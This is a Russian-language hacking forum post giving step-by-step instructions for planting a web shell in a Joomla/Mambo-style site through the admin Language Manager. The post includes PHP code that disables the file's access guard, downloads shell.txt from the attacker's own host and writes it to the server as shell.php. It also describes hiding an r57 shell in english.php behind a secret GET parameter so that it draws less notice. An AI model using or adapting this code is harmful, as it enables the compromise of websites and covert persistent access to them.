08.09.2008, 22:04
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
Сообщение от Grey
Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):
заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:
z:/home/test1.ru/www/ language/english.php
он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):
PHP код:
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
Экранируем эту строчку и дописываем подарок:
PHP код:
if($HTTP_GET_VARS['a']==1)
{
$file = file('http://адрес твоего сайта с шеллом/shell.txt');
$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i = 0; $i < count($file); $i++)
{
fputs($file2, $file[$i]);
}
fclose($file2);
}
// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' );
Дальше переходим по линке:
http://test1.ru/ language/english.php?a=1
И получаем шелл:
http://test1.ru/language/shell.php
P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд. Я не понимаю с чем связано, но запуская шелл постоянно получаю ошибку 500 Internal Server Error, поэтому загружаю шелл прямо в english.php, который вызывается с определенными параметрами в GET-запросе:
if ($_GET['xek']=='ontechad'){
// r57
}
www.site.com/language/english.php?xek=ontechad
|
|
|